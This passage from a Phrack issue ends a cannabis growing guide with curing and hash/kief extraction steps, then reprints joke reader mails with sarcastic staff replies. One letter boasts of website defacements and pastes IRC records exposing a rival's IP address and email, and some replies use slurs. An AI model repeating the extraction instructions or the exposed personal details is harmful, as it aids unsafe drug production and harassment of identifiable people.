place them in a brown paper bag for further drying. Once they snap, place them in glass jars for curing. Also, save all the trim from manicuring for making extracts. You can place it in a ziploc bag and put it in the freezer until you're ready to make extracts. Check on the glass jars once a day. Open each jar, and take a whiff. You'll notice over time how the smell changes. Check out the buds. Try snapping a stem. If it folds, either put the buds back in a paper bag, or keep the jar open a bit longer. For a quick, 2-week cure, keep jars open 15-60 minutes per day depending on dryness. If buds are dry, don't leave the jar open too long, but open it at least once a day to allow the air inside to exchange. During the curing process, chemicals inside the buds break down, mainly those that cause harsh smoke. The longer the cure, the smoother the smoke is, but I can't say that anything longer than 8 weeks really makes a difference. Once the buds smell like they have cured, try smoking it. Continue the curing process until the smoke is smooth and clean. 0x0C: Extracts Now here's the fun part. Personally, I like making kief, hash, and baked goods. Butane extracts are also pretty easy. I won't go into detail on those, but making a butane extractor with PVC and a lighter refill can is simple, and there are plenty of guides available online. If you want to make butter or oil for cooking, you can use kief or hash you've already made and not worry about filtering, or you can use the trim in its entirety. If using trim, fill a pot with the amount of butter or oil you want to make. Add just enough water to the pot so that it won't splash or boil over, but otherwise more water doesn't hurt. Mix it all together, and add the trimmings. Simmer the mixture for a minimum of 2 hours and up to 24 hours -- I definitely notice a difference between 2 and 24, but I can't say where the threshold is in between. After it's done cooking, transfer the mixture through a strainer into another pot or bowl, and place this into the refrigerator. The oil or butter (along with the good stuff) will rise to the top, and the water will sit at the bottom. Since THC and the other chemicals are oil- but not water-soluble, none of it should be lost in the water. If the oil hasn't solidified at all, placing it in the freezer for a little while should do the trick (too long and the water will freeze). Scoop out the oil or butter, and use for baking, or spread on toast! Making water hash is pretty easy. Get yourself a set of extract bags (minimum 3) including at least either a 73-ish or 90-ish micron bag. In a set of 3 the others should be around 25 microns and at least 180 microns. Place each bag, smallest first, into a bucket, and fill the bucket with ice-water. Add the trim, and mix for 15-20 minutes with a kitchen or paint mixer. Let the mixture settle for about half an hour, then remove each bag one at a time. The first will remove the trim, and others after will have hash and/or contaminants, depending on how many bags you use. If the set comes with a screen, use the screen to press the water out of each mass of hash. Scrape the hash off and set aside to dry. Even easier than water hash is what I like to call white-trash hash. What comes out is really kief, but you can press the kief into hash if you want. Procure a large container, like a storage bin for a shelf. One with fairly high walls is good so it captures as much of the mess as possible. Take your 73-micron bag, and put your trim inside. Fill the rest of the bag with broken-up dry ice. Tie the bag off (hold it closed), and shake into the container until all the glorious beauty falls out. You may want to split into multiple sessions, the first being more pure and second-grade after that, but I usually just shake until it looks like it's all out. What you end up with in the bag is a green, sloppy mush that you can go ahead and discard. The bin, however, is now full of wonderful kief. Smoke it now, or save it for later. Press a chunk into hash between your palms, or put some in a baggie in your shoe and walk on it until it turns into hash. 0x0D: Signs and Symptoms I've saved the worst for last. Here are different signs and symptoms of various problems you may encounter. Perfect: The sign of perfection is perky plants, solid to deep-green colored (but not too dark). Leaves point upward at a 40-60 degree angle and toward the light. Daily growth is visible. Pistils are perky but not crooked at the ends. Over-watering: leaves will curl downward, with the middle section being the highest, kind of like it's trying to be an umbrella. Wait as long as possible before watering again, and make sure to provide at least a mild nutrient solution especially if straight water was used at the previous watering. Under-watering: Can be similar to heat stress when it occurs frequently, but otherwise the leaves will lose perkiness and wilt, lying beside the stem and pointing downward. Pistils first show signs with crooked ends, and soon after they shrivel and change color. Make sure to fully soak the container after this occurs, the best way being a slow flow of water rather than gushing out of a watering can. Heat-stress: Leaves fold up and inward, especially at the edges. Fix by moving the light further away or reducing the temperature. Supplement with extra air flow and a small extra watering (straight water is usually best for this to prevent nutrient burn when coupled with heat stress). Nitrogen deficiency: Leaves yellow to light-green. Treat by increasing concentration of veg mix. Nitrogen toxicity: Leaves very dark green, later start burning. Treat by reducing the concentration of veg mix. Phosphorus toxicity: Leaves dark green (purple tint sometimes) and wilt, curling downward. Treat by reducing the concentration of flowering mix. Various toxicities, deficiencies, pH burn: Chlorosis (dying plant matter) on various parts of leaves. Different styles signifiy different problems, but overall consider what changes have been made recently. Check pH of nutrient solution. Fix by flushing medium with a mild nutrient solution at proper pH. Avoid using supplements, just use a basic nutrient mix for the current phase. Treat a suspected deficiency with only a slight increase in what you think is needed. More often than not micronutrient dificiencies are only present when using synthetic nutrients and only when not using any other supplements. Mild deficiencies are not likely to show visible symptoms. Bugs! Many different bugs will want to eat your plants. Some of the most annoying are aphids and spider mites. Insecticidal soap works well with aphids, and neem oil works extremely well with spider mites. For aphids, spray on site. Most soaps take care of them well. Also consider removing infected plant matter. For mites, spray thoroughly and afterward remove leaves with noticeable spots since these 90%+ of the time have eggs. Neem will kill the mites but not the eggs. Spray again 2-3 days later and again a week after the first. Afterward, inspect daily and spray as needed. Grasshoppers eat the leaves. Sorry Mr. Grasshopper, but you gotta die. Pick them off and get rid of them however you choose. Caterpillars eat everything, especially the buds. Inspect dying bud matter for caterpillars, and remove those found. Spray with a Bt solution -- it's a bacteria that when eaten causes the caterpillars to stop eating. These methods are all organic (or available as organic). Use synthetic pesticides only in severe cases, and only before buds begin forming. Both the insecticidal soap and neem oil can be washed and rinsed off with regular soap at harvest if necessary. Mold! Mold sucks. Bud mold is highly infective and destructive. Bud mold is characterized by grey/black along the stem and spreads quickly. Remove entire affected plants immediately. Place in quarantine until sure of the diagnosis, then destroy any infected plants. Powdery mildew is annoying but treatable. It is easy to spot -- visible white spots with a powdery look on top of leaves. Treat by spraying with a baking soda solution and increasing air flow. Decrease humidity for up to a week after symptoms disappear if possible. 0xFF - Fin That concludes this guide. I hope you've enjoyed reading it, and I hope you're now ready to grow some super ultra dank megabuds. |=[ EOF ]=---------------------------------------------------------------=| ============== Page 5/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13 |=-----------------------------------------------------------------------=| |=------------------------=[ L O O P B A C K ]=------------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ Phrack Staff ]=--------------------------=| |=-----------------------------------------------------------------------=| Hi there! The least we could say is that p67 caught the attention of a lot of people. We got a very good feedback both IRL, on IRC and through the comments on the website. Good. As you will soon find out, we had quite a bunch of (un)interesting mails this year which we would like to share obviously ;> Before going further, a quote from the last loopback is necessary: --- We humbly apologize to all guys we never answered to neither by mail nor through this phile because we suck at filtering our spam (this could _absolutely_ not be a laziness issue, right?) --- That said, we have to thank all the people that (un)voluntarily sent their contributions, whatever these were. As you will see, a polemic started with the release of the last scene phile as several people felt a bit disappointed (to say the least) by the description of the gr33k scene. So let's explain a few things about the context of its writing: - The writing itself is small and oriented because the authors didn't have the time to do better. - We (the phrack staff) are the ones who asked them for such a phile and being in a hurry we couldn't give more than a couple of weeks to the authors. Clearly they *SAVED* our sorry ass and they did it for you, the community. Sincere apologies of the staff if this was not good enough. - (Greek) people may argue that the description was not accurate itself but as you can remember, it was written with the idea of being completed in this release: Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10 --- In this brief article we will attempt to give an overview of the current state of the Greek computer underground scene. However, since the strictly underground scene in Greece is very small, we will also include some information about other active IT security related groups and forums. There is a going to be a second part to this article at a future issue in which we will present in detail the past of the underground Greek scene in all its gory glory. --- And they kept their promise with the help of some notorious big shots of the greek hacking scene. To the bunch of losers/masturbating monkeys who are still complaining: /"\ |\./| | | | | |>~<| | | /'\| |/'\.. /~\| | | | \ | =[@]= | | \ | | | | | \ | ~ ~ ~ ~ |` ) | / \ / \ / \ _____ / |--//''`\--| | (( +==)) | |--\_|_//--| Don't worry, we published your side of the story as well. And now is time for our little ... hem ... group therapy session ;-) -- The Phrack Staff [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Unix Root <1161967623738704101@mail.orkut.com> Subject: orkut - Unix Root wants you to join orkut! Unix Root wants you to join orkut. [ Unix Root himself, seriously? ] Join now! http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22 [ id has been replaced to protect the innocent (us) ] * * * What you can do on orkut: - CONNECT with friends and family using scraps and instant messaging - DISCOVER new people through friends of friends and communities - SHARE your videos, pictures, and passions all in one place [ Sounds like it would change my life. ] Help Center: http://help.orkut.com/support/ [ To tell you the truth, help won't be necessary at this point :> ] --- From: ***** ***** Subject: Invitation to connect on LinkedIn LinkedIn ------------ I'd like to add you to my professional network on LinkedIn. - ***** [ What if we do not intend to do business with you? ] **** **** Owner at The Hacker News New Delhi Area, India Confirm that you know **** ***** https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/ -- (c) 2011, LinkedIn Corporation [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x01 - ]=----------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Poison Blog Subject: TeaMp0isoN: Issue 1 My first ever zine, read it and let me know what you think. hoping it gets published in the next phrack magazine. [ Hem. So basically this is a new concept: publishing a zine inside another zine. And we even got 0day-hashes in the process. WIN/WIN ] - TriCk [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x02 - The usual mails ]=-----------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] [ Have you ever been curious about the kind of mail we are used to receive? Let's have a taste. ] --- From: skywalker Subject: how can I get the source code hello, I found some source code in phrack Magazine, but it is attach with text mode, how can I get it? [ Download the paper in "text mode". Then comment everything inside that is not the code you want to compile and fire gcc. It might work. If it doesn't mail nikoletaki_87@yahoo.gr for help. ] --- From: Nikol Eleutheriou Subject: Phrack issue 58 How can i get the binary-encryption.tar.gz from the article Runtime binary encryption? [ You can't; it's encrypted. I think oyyj07@gmail.com has the password. You should get in touch with him. ] --- From: stephane.camprasse@free.fr Subject: edition 64 infected by OSX:Niqtana Hello there, tar.gz of the magazine number 64 appears to be infected: http://www.sophos.com/en-us/threat-center/threat-analyses/ viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx [ Wow. Sounds like a serious issue. What should we do? ] Kind Regards Stephane Camprasse, CISSP [ At first we wanted to laugh, then we saw you are serious business. ] --- From: Domenico ****** Subject: Mailing Lists Phrack Dear Phrack Staff I would like to subscribe at mailing lists of Phrack but email addresses provided by the site not exist. [ That's because there is no ML, dude. ] What do you advise me? [ Well, keep looking. ] Best Regards Domenico ******* --- From: Robert Simmons Subject: phrack via email Do you have a mailing list that sends phrack out via email, or at least an email reminder to go download it? [ We don't. What would be the point in a bloggo/twitto world where information spreads that fast? ] Rob --- From: Elias Subject: How do i subscribe? As the title says, how do i subscribe to Phrack? [ Since you're not polite we won't accept your subscription. Don't mail us again. Please. ] --- From: William Mathis Subject: One paper can change everything! [ New submission???? :D ] What do I mean? Of course the Diploma. [ 0wned. Deception is part of the game :-/ ] It is no secret that the knowledge, skills and experience play a crucial role in getting the desired position, but despite the formality when applying for a job essential requirement is a diploma! At the moment receive a diploma is very expensive, takes time and power. ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND EXPERIENCE! [ Can we send our order in via PDF? You have to open it with Acroread 9.x though, since you're only worth an 0lday to us. Thank you for playing "rm me harder" w/ phrackstaff! ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x03 - Desperate house wifes ]=-----------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Luna Tix Subject: A request regarding pdf files [ Our resident Adobe consultant is currently on holidays. We do have our .txt specialists however. ] Hi, I have downloaded some adobe 3d files from a website, and need them to be converted into autodesk inventor ipt files. [ You've knocked on the right door. ] Can you teach me how to do this? If yes, I can send you some of the files for trial, if you are successful, I am willing to pay for it. [ Excellent! How much can you pay exactly? Our local liquor store no longer accepts PDF conversion techniques in exchange for beer. ] All the best. Luna --- From: sabrina Subject: don't know where to go hi, i'm in need of someone to help me in a cyber cat burglar kind of way. i've tried all the legal ways... police, fbi, fed trade commission all to busy with terrorist. [ Now that they've caught Osama, they should have some free time. Try to contact them again. ] i can go to a detective then civil lawyer but that would take way too mush time and an exorbitant amount of money. [ Clearly, you've mistaken us for the cheap option. ] i need someone to find information on exactly where someone is located. i have email address, cell phone and bank account numbers ... [ Do you have GPS coordinates? ] I'm hoping to find or at least be lead to some one who is very creative in using their computer. my only goal is to locate this person, i'm not out to steal or do any harm. [ I know some very creative people. They compose music on their computer! For realz! Would that help you? ] if you think you can help me i'll give you my phone number, i can then better explain why this way for me would be the only way to go, i lost 20 years of my life's hard work, i just want to locate this person. [ Wow, sorry for being so hard on you with the previous comments, Sabrina. It is obvious to us now that you are clearly retarded. Please leave a comment on the website with your phone number. We'll get back to you. ] thank you sabrina [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x04 - Cooperation ]=---------------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Monika ****** Subject: cooperation Dear Sir or Madam [ It's professor actually. ] My name is Monika *********. I represent Hakin 9'- IT Security magazine (for more details, please see our website www.hakin9.org). I would be very much interested in long term cooperation with your company. [ Our company? :D ] We would co-promote our services and spread the information on IT Security together. [ Well the problem is that we don't have that many services: - 7-bit cleaning of ASCII papers, we are considered the market leaders in this service - Spam hunting with advanced regexp (i.e. matching ANTISPAM in the subject) - Mail storage, no backups though :( - Technical review of papers when we understand them See? That's not too much :-/ But thanks for the kind offer. PHRACK could totally use the promotion of such a well established magazine as h8king (or whatever). ] I am really looking forward to hearing from you. [ Don't call us, we'll call you! ] Best Regards, Monika ******** Software Press [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x05 - Help is requested! (again) ]=-------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Kevin **** <********@att.net> Subject: Help with Persistent BIOS Infection Hope you can help. I have a small video business and from my son's school flashdrive my network of computers are infected with Persistent BIOS Infection. My hard drive's have been rearranged with FAT segments and i believe is running my XP/Win7 OS's as a virtual machine. [ Unfortunately Joanna is not part of the staff. But we have the feeling that your analysis of the situation could be improved :> ] This has caused my rendering performance to be ruduced by 50%. Also when i make DVD's the infection is on the disc and from complants it infected other machines. My software is legit and i don't download anything. [ Of course. Who does anyway? Your son perhaps :> ] I'm new (6yrs) to computers, i some what know what to do but not really. [ So you know but you don't know. That's good, have the half of you that knows guide the other half that doesn't. You can't go wrong. ] I have killed my network and now keep all computers separate but know somehow i will get the infection back. [ You killed the poor network? :-/ ] Could someone make me a batch file or better yet a ISO to boot and fix my Bios and memory so it has Persistent BIOS Infection that is null. Giving back my rendering power. Making it so i can't get this infection again. [ Just a thought: maybe if you didn't run arbitrary batch files that "someone" sent you, you wouldn't have this problem in the first place. But most probably that's not it. It must be a 'Persistent BIOS Infection' problem. ] Maybe send me a zip file to my email address. Pleezz I would be more than happy to donate for the cause. [ And yet another person willing to give us money. We should really run a company :D ] Thank You Kevin **** *******@att.net --- From: shashank **** <**********@gmail.com> Subject: hey hey, i was searching some hacking forums site, & found one of the "phrack Magazine". [ Then you failed. It's not a forum kid :) ] It was pretty interesting. Can you help me out on how to hack Steam Account. [ Do you have a paypal account? ] --- From: David ***** Subject: RootKit Iphone 4g Hey i was recently on your website and well i was looking for something to mess with my friends, see were all in the same class and we all connect to the same network/router thing, and you hve to login to gain acess to the network, so i was wondering if there was a way to control my friends computer with mine while were hook to the network. [ XD ] DoFoG [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x06 - About the scene philes ]=-----------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: Prashant KV Subject: Thank You [ You're very welcome. ] Hi, I would like say thanks each and every individual in Phrack team for publishing our article. This will go a long way in creating awareness about null community. Thanks all.... [ And thank you for the scene phile. Always a pleasure to exchange with interesting/nice people. ] --- From: Hackers News Subject: Article Editing [ HEY!!! You're the guy who tried to befriend us on linkedin!!! ] Hello Sir, We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We read an article on your Website : http://www.phrack.org/issues.html?issue=67&id=16#article I wanna ask you that on what basis you write about "*Indian Cyber Army : http://www.cyberarmy.in/*" . * Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as fake ICA by the actual ICA group. One glance at the website content tells you that there is some truth to what the actual ICA(indishell) guys and other say and reminds you of the infamous plagiarism cases (Ah! Any Indian h4x0r's favourite topic when they feel like bitching about something :-P)* *Whatever you write is not fair and I think it represents the mistake done by you, that you write about a group without knowing about them, Read This : * *http://www.cyberarmy.in/p/about-us.html* *and I think you should 1st know about it. Hope you will edit the article.... as soon as possible.* [ You may or may not be right and clearly we don't have enough information to judge. For the sake of the truth and freedom of speech, we are posting your comment. ] *Thanks,* [ No prob dude. ] *Owner* *The Hacker News...* --- [ The following is a mail that we received several times between the 21st and the 22nd of June... As we said in the introduction, a few greek people were angry because of the scene phile. Because we're (not that much) bastards, we felt that these people deserved the right to be published as well. So here it is... Oh and they even pasted it in the comments! ] From: xak xak0r Subject: Greek Hacking Scene is alive! From: Unkn0wn Subject: GHS - read this message From: Spyros Kous Subject: GHS for you. From: nikos piperos Subject: By From: ****** ******* Subject: greek.hacking.scene [ Sorry, due to ASCII constraints we had to censor the name of this guy :D ] From: Stephen O'Neill Subject: 0xghs [ You've got your hex wrong dude ] From: Brian Higgins Subject: ************************** [ Hey next time write the subject in english please :) ] From: eibhlin mcnamara Subject: G*H*S - always here [ A sibling of Sean maybe? ] From: nikpa pfcc Subject: Greek Hacking Scene - Read your errors From: nikpa papaa Subject: Greek Hacking Scene - Read your errors [ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of you guys delivered. Worst Greek Hacking Scene evar! Would not order from you again. ] From: NIKO*** *ANTAZO*OY*** Subject: Read this, about errors - GHS [ This one had his name only partially encrypted. ] From: kondor fromGHS Subject: Greek Hacking Scene [ Hey Kevin Mitnick? :) ] Nice to see Greek Hacking Scene on Phrack, but very sad to say that there is no connection of all those with reality. This post represents something that even doesn't exist except theory. In the other hand, is not mentioned technological steps and targets that Greek Hacking Scene archived, not in theory, but in actions. However in the References i see nothing trust source, while you avoid posts on newspapers, magazines and tv about Greek Hacking Scene. Maybe Phrack can't handle the name of GHS and writing about fantasies. Greek Hacking Scene is not a group, team or crew etc. but is ideology of decades, is not about fame, but is about targets, technology and advance. You must know that GHS does NOT follow things such "Hackers Manifesto" and is well known that this person take back what he said about this manifesto in shake to save him from things. He even does NOT defence his ideology, how then we can accept such thing?! Basically we are what we create and we gonna call hacking what we think hacking is, you can call us as you want, but this can't change our actions, we not negotiate our ideology and we are not followers of any paid, fantasy or theory ideologies. We rage against machine, the system. Is good that Phrack exist cuz keep the magic to those who want to be related with hacking. While you keep the feeling of magic to your readers, we know that is all about coding, methodology and how far each mind can think to do things. For those who forgets, security is a part of hacking, security is not hacking. Hacking is every electronic violation, violation doesn't mean that is illegal always. As a term, hacking is every electronic violation. About Greek Hacking Scene you forget to mention a lot of groups and people (and is not about names) who they did things and they left lot of stuffs behind. Those people and groups they never care about their nicknames or the name of the group cuz is useless, can be any nickname or group name, at the end what it left, is what had created. Who make it, it doesn't matter really cuz those who make it as share they do it cuz they want. If is to write about things that are not related with the true and reality, better don't write about Greek Hacking Scene. You can write for posers and others who they want fame, but not for GHS. You can write fantasy, stories, anything you like, but as long as is not connected with reality and true, then don't write about Greek Hacking Scene. Maybe you can write for any other Greek Hacking Scene you want or you believe, but mention also that is not connected all those stories with Greek Hacking Scene (GREEK SENTENCE). [ GREEK SENTENCE is something written in greek that we could not translate nor write in the phile because of the greek alphabet. ] Cheers, Your article forgets to write about DefCon meetings that take place in Greece, and of course about the unique Codehack meetings that shows live Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the references on magazines, newspapers and tv? What about the members of Greek Hacking Scene that works on penetration testing companies or making atm softwares and banking or those who works in known computers and servers companies and they create technology?! About the grhack (that nobody knows) is those guys from auth that got hacked their servers and their pcs and tooked personal files of them? Check this link: http://zone-h.org/mirror/id/6638423 I read slasher?! This person who has the grhack site that you took as reference?! With the name ********** **********?! [ Publishing an individual's real name is against our rules. You got away with it in the comment section once. ] Oh come on, i have also beautiful pictures who they poser as engineers! Oh now i got it! They write about their selfs! How smart... what a fame... what a pose! Before you write anything about Greek Hacking Scene take a look to the targets. We have down anarchist such indymedia sites, and also nationalist sites, as well he hacked into Goverment sites, political parties, national services, and of course all the hacking-security related greek sites who they offer only theory and lies that has no connection with reallity and hacking. And i guess so you promote the Anarchy?! So don't forget Phrack to mention that everything you wrote is about Anarchy, not about hacking. Greek Hacking Scene has members from all political sides and we have things in common we work for. This is grhack.net, this is the guy that send hopeless messages to google blogspot to DOWN the info that SpyAdmin post, passwords, files, everything! ->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo) ->> Slasher is on: #grhack #anarchy --ChanServ-- Information for channel #grhack: --ChanServ-- Founder: Slasher --ChanServ-- Description: GR Hack - http://www.grhack.net --ChanServ-- Registered: Aug 05 21:36:46 2010 EEST --NickServ-- Information for nickname Slasher: --NickServ-- Realname: LoCo En El CoCo --NickServ-- Is online since: Dec 21 17:26:15 2010 EET --NickServ-- Time registered: Oct 25 23:22:13 1999 EEST --NickServ-- Last quit message: Ping timeout --NickServ-- E-mail address: slasher@grhack.net --NickServ-- Options: Kill protection, Security, Private --NickServ-- *** End of Info *** Maybe spyadmin is closed by google blogspot after the emails of grhack.net Slasher cuz the stuff is related about him but look the comments of this website and the date, to know the existance of spyadmin http://press-gr.blogspot.com/2007/09/blog-post_3165.html (SOMETHING IN GREEK...) spyadmin.blogspot.com (SOMETHING IN GREEK AGAIN) (7 September 2007) Now look also the date of the defacement in the zone-h digital archive: http://zone-h.org/mirror/id/6638423 and look the date too, # Mirror saved on: 2007-09-08 13:58:32 # * Notified by: GHS (8 September 2007) --- Greek Hacking Scene has no colour and does not support any political side. Take example to indymedia athens, i will give you 2 links, in the first they say that GHS is nationalist and hack their website, and in the other link on the same website, they give congratulations in GHS cuz they did actions and defacements according to left ideology. In fact GHS has it's own ideology and act as GHS believe. 1 link: http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D706934 2 link: http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D620090 The comments are yours, let see the Freedom of Speech now, the TRUE the REALITY, the FACTS! Somes they didn't learn from their mistakes. GHS has no hate for anyone and act not for revenge causes or anything else. According to all our actions, we do warning and when we act we just put the informations as is, we don't put sauses, you put sauses maybe. The reason i wrote this is the true and reality. Before some years there are many "hackers" in Greek chat rooms etc, they speak about theory and when kids comming to learn, they laught only at them and they make those kids to become like them, liers without education and knowledge, kids that become like them, to know just some words, theory without they know what for they speak about and to spend lost time chatting and destroy other kids comming. Members of GHS hacked and take access in most and almost all Greek websites, chat rooms, irc servers etc, that was security-hacking related. We are always here, maybe not the same persons, but members of GHS are change all the time and keep the safe ideology. In the other hand, we let teenagers who are interested to hacking, we turn them to coding, to let them think their future, education, freedom ideas and to let them want to do things and create. Defacements and Hacking are our fireworks to let them get the magic and on the way to show to them that there are so many tools and things on net to hack a website and hack, but if you want to go more further, you have to learn coding, to explore, to let your mind free and think far away, for what can be happen and what not. To go a step further with their minds, not by giving them stuff in the plate, but let them do it and explore it by their selfs! I know keeps that believe and do things, on the way they do things and go advance, those kids are the next cycle of GHS who will pass the same ideas, believes and technology to the next generations. Greek Hacking Scene 2010. [ All we can say is 'What?' ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x07 - Interesting mails ]=----------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: "L. *****" Subject: idea for next profile my you should do a hacker profile on j3ster since he is one of the most prominent hackers that I've heard about out there, [ Dunno the guy. We already chose one anyway. You may have heard of him. ] or do one on that rat who turned in bradley manning [ The saying is not: Snitches get Prophiles. ] --- From: infosec Subject: Release date? Hi Guys, Firstly, let me thank you for the on-going release of this great e-zine. [ You're welcome. ] Most of these e-zines surfaced and then disappears over the horizon yet albeit the long term delays in-between releases :)you've kept this going. Thank you. [ ^_^ ] I am very much interested in the up and coming release and would like to know the date or drop us a note on the website. [ Done. ] Also, I'd like to know how to join phrack team of staff. [ There is a GREAT mystery about how the phrack staff acquires members. Sorry dude, there is currently no open spot :) ] Greetz, infosec --- From: Zagan Hacktop Subject: YO! do you still have an IRC? [ We do. But it's a private one. We may open a public or half-public one someday... Don't hold your breath however. ] --- From: daniel ***** <******@gmail.com> Subject: new age LoD hi am a head of a team that disided that LoD is a legacy and cant just disappear... it must be reborn or the web will loose alot and with the way things are going today the web realy cant efored it or it will eventualy die for the simple user... we are looking for the original LoD members (or at list any way to comunicate with them) (specialy for night lightning) if this information can be passed to them it would be realy nice.. all we want is a some advice (not technical) ... my email is ******@gmail.com (nick: galeran). if you can help please do thanks [ Not sure about the true intentions but anyway this might help.] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x08 - Greek people are angry ]=----------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] [ For clarification purposes, we received this mail after we released the index and before we released the philes. ] --- From: Iordanis Patimenos Subject: Phrack 67 [ So what, another greek? At least this one is not complaining about the scene phile ;) ] YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only thing you had to do was to let the knowledge flow. [ The only thing? Such a nice little kid daydreaming :) ] What to do the info in 'Scraps of notes on remote stack overflow exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under Unix/VMS' (FORTRAN wtf), [ FORTRAN... indeed :') We'll do something about COBOL as well (it is 'safe' so no memory corruptions, something else). We'll keep you posted. ] 'A Eulogy For Format Strings' if we cannot apply on current protection mechanisms. [ Well that's the point. You can. Oh wait, you would have known if you had kept your sorry mouth shut and actually read the papers first :> ] New edit or better you didn't publish this new fucking delayed, bad content phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded content you provided after all this waiting time!!! Not a chance to compare to previous phrack issues. This issue is just a joke, nothing more, happy 1st APril assholes, you made PHRACK seems trash magazine. [ The cool thing with morons like you is that it would be pointless to explain things, which makes our job somewhat easier. Congratulations for your participation in p68, you've made it ;-) ] -Fan of Phrack- [ Yes. It shows. ] --- From: Nikol Eleutheriou Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON [ Another desperate housewife? The name is familiar...] YOU ARE SO FUCKING FUNNY [ WE DO HOPE WE ARE ] I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE THAT YOU TRIED TO ADVERTISE AS A BIG HIT) [ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ] JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL [ NOT IN JUNE, WE ARE *ALWAYS* LATE ] --- From: Nikol Eleutheriou Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON Group: The Phrack Staff [ Hum, it seems that you have fixed the capslock problem. You're elite. ] Most *FAIL* group ever in phrack, you hurt the magazine go away. [ Hey now I remember you!!! :) It looks like you are obsessed with us. You must be our number one fan in greece. Even now that we have so many greek fans. ] >>>>>>>>>> From earlier >>>>>>>>>> From: Nikol Eleutheriou Subject: Phrack issue 58 How can i get the binary-encryption.tar.gz from the article Runtime binary encryption? >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [ So: 1. Did you manage to download the file? :))))) 2. *EPIC* *FAIL*? ] --- From: Nikol Eleutheriou Subject: New phrack issue [ What? You again? ] Marry Christamas :) and happy New York [ LOL. You're doing it wrong! ] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] |--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=| [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] From: ***** ******** Subject: ANTISPAM Hi guys :) Here's an article I've just written, I know it's a bit late for the submissions, but perhaps you may publish it in the next issue. Anyway, the topic is how to bypass a captcha, and, in particular, how to bypass the one on your site :). No offense, but it's really weak. [ None taken. We simply took the first capcha mechanism available on the web 